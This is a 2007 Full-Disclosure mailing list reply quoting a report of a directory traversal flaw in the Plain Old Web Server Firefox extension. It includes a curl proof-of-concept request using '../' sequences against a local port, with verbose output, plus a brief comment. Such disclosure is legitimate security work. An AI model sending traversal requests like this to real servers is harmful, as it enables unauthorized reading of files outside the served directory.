[Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
Matthew Flaschen
matthew.flaschen at gatech.edu
Fri Feb 23 19:21:36 GMT 2007
Stefano Di Paola wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
>> GET /../../../../ HTTP/1.1
Yep, I think it's just a rite of passage for all web servers.
Matthew Flaschen
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 254 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070223/c2669bd9/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.